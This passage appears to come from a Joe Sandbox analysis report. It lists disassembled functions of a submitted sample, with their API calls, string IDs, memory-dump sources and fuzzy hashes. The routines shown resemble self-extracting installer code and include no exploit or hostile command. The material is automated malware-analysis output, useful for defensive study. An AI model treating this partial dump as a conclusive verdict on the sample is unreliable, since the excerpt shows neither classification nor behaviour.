                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionThrow
                                                                      • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                                      • API String ID: 432778473-1797977924
                                                                      • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                      • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                                      • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                      • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                                      Function 004054C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                                        • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                        • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                        • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                        • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                      • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                      • API String ID: 4038993085-372238525
                                                                      • Opcode ID: 6ca09179b832223042facc11ae16c442de1ccabb0ed3d8059e6af2b2fd03001d
                                                                      • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                                      • Opcode Fuzzy Hash: 6ca09179b832223042facc11ae16c442de1ccabb0ed3d8059e6af2b2fd03001d
                                                                      • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                                      Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf$ExitProcesslstrcat
                                                                      • String ID: 0x%p
                                                                      • API String ID: 2530384128-1745605757
                                                                      • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                      • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                                      • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                      • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                                      Function 00407DA1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00407DB6
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                                      • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                                        • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                        • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                      • String ID: A
                                                                      • API String ID: 1557639607-3554254475
                                                                      • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                      • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                                      • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                      • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                                      Function 00402B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                        • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                        • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                      • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                      • String ID: SetEnvironment
                                                                      • API String ID: 612612615-360490078
                                                                      • Opcode ID: 8975c290c05f081b3aa48b512297cf9d3deb81da162b8f1c3ca5211d61be9246
                                                                      • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                                      • Opcode Fuzzy Hash: 8975c290c05f081b3aa48b512297cf9d3deb81da162b8f1c3ca5211d61be9246
                                                                      • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                                      Function 0040464B Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$lstrlen
                                                                      • String ID:
                                                                      • API String ID: 2031685711-0
                                                                      • Opcode ID: b3cd9207120c84d70b9ea52e1c46f734d4eabb935de8e223c649fd635fb9ec59
                                                                      • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                                      • Opcode Fuzzy Hash: b3cd9207120c84d70b9ea52e1c46f734d4eabb935de8e223c649fd635fb9ec59
                                                                      • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                                      Function 0040809D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                                        • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                                      • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                                      • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$??3@
                                                                      • String ID: 100%%
                                                                      • API String ID: 2562992111-568723177
                                                                      • Opcode ID: 7979a779bedf5e19285ed635ff8e0537a4e449d31975b828e080063ae18fe76e
                                                                      • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                                      • Opcode Fuzzy Hash: 7979a779bedf5e19285ed635ff8e0537a4e449d31975b828e080063ae18fe76e
                                                                      • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                                      Function 00405644 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00403EBC: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                        • Part of subcall function 00403EBC: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                        • Part of subcall function 00403EBC: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                        • Part of subcall function 00403EBC: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                        • Part of subcall function 00403F77: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                        • Part of subcall function 00403F77: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                        • Part of subcall function 00403F77: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                        • Part of subcall function 00403F77: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                        • Part of subcall function 00404032: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                        • Part of subcall function 00404032: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                        • Part of subcall function 00404032: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                        • Part of subcall function 00404032: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                        • Part of subcall function 004040ED: ??3@YAXPAX@Z.MSVCRT(?,?,0041984C,%%P,?,?,00000000,?,?,00406260,?,00000000,0000000A), ref: 00404114
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00405715
                                                                        • Part of subcall function 0040327D: GetEnvironmentVariableW.KERNEL32(004056AD,?,00000001,xu_,00000000,H|_,?,?,004056AD,?,?,?,?,?,?), ref: 00403293
                                                                        • Part of subcall function 0040327D: GetEnvironmentVariableW.KERNEL32(004056AD,00000000,?,00000001,00000002,?,?,004056AD,?,?,?,?,?,?), ref: 004032BF
                                                                        • Part of subcall function 00402B71: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                        • Part of subcall function 00402B71: ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,005F9D00,?,?,?,xu_,?,H|_,?,00419810,?,?,?), ref: 004056F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$Environment$Variable$ExpandStrings
                                                                      • String ID: H|_$xu_
                                                                      • API String ID: 2352103411-4026904983
                                                                      • Opcode ID: cd0632ae3cb62befe143438c45848d6e603760a0b2c7569f7b16b59909fdaf46
                                                                      • Instruction ID: e77c6db790fd3265e7e8a04a5d27ee92cfaa5bcfb68e3ac2f2838415660c2c6c
                                                                      • Opcode Fuzzy Hash: cd0632ae3cb62befe143438c45848d6e603760a0b2c7569f7b16b59909fdaf46
                                                                      • Instruction Fuzzy Hash: EE21FC75C0010DAACF00FBE5DC46CDE7B7CEA44709B40847BF610B3191D739AA558BA8
                                                                      Function 00404E99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                                        • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                                      • wsprintfW.USER32 ref: 00404F19
                                                                      • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$??3@wsprintf
                                                                      • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                                      • API String ID: 1174869416-1550840741
                                                                      • Opcode ID: 95ec4e621bfc920f5473338c82ae4d920d2910342d5ae7ea90fe2488f177eb41
                                                                      • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                                      • Opcode Fuzzy Hash: 95ec4e621bfc920f5473338c82ae4d920d2910342d5ae7ea90fe2488f177eb41
                                                                      • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                                      Function 0040327D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetEnvironmentVariableW.KERNEL32(004056AD,?,00000001,xu_,00000000,H|_,?,?,004056AD,?,?,?,?,?,?), ref: 00403293
                                                                      • GetEnvironmentVariableW.KERNEL32(004056AD,00000000,?,00000001,00000002,?,?,004056AD,?,?,?,?,?,?), ref: 004032BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentVariable
                                                                      • String ID: H|_$xu_
                                                                      • API String ID: 1431749950-4026904983
                                                                      • Opcode ID: ff2b79dc44754d6f907cf6e634d94b8b1123ce8e5b5ca496a994bbb7e1074a74
                                                                      • Instruction ID: 7df30db2680526248f54be3d9c295913fdf74715706c85616ae183fd9519d1a4
                                                                      • Opcode Fuzzy Hash: ff2b79dc44754d6f907cf6e634d94b8b1123ce8e5b5ca496a994bbb7e1074a74
                                                                      • Instruction Fuzzy Hash: A6F09C71600118BFDB01AF59DC419ADB7EDEF88764B10403BF945D72A1D7B5DD008794
                                                                      Function 0040421B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                      • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                      • _wcsnicmp.MSVCRT ref: 0040423D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$_wcsnicmp
                                                                      • String ID: Mg@
                                                                      • API String ID: 2823567412-3680729969
                                                                      • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                      • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                                      • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                      • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                                      Function 004023B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                      • API String ID: 2574300362-3900151262
                                                                      • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                      • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                                      • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                      • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                                      Function 004023E9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                      • API String ID: 2574300362-736604160
                                                                      • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                      • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                                      • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                      • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
                                                                      Function 00402DD6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                        • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$ByteCharMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1731127917-0
                                                                      • Opcode ID: f6ac9d4c0139cef4d9b8beefe4760dccd727682243e06668031b0770e13a0576
                                                                      • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                                      • Opcode Fuzzy Hash: f6ac9d4c0139cef4d9b8beefe4760dccd727682243e06668031b0770e13a0576
                                                                      • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8
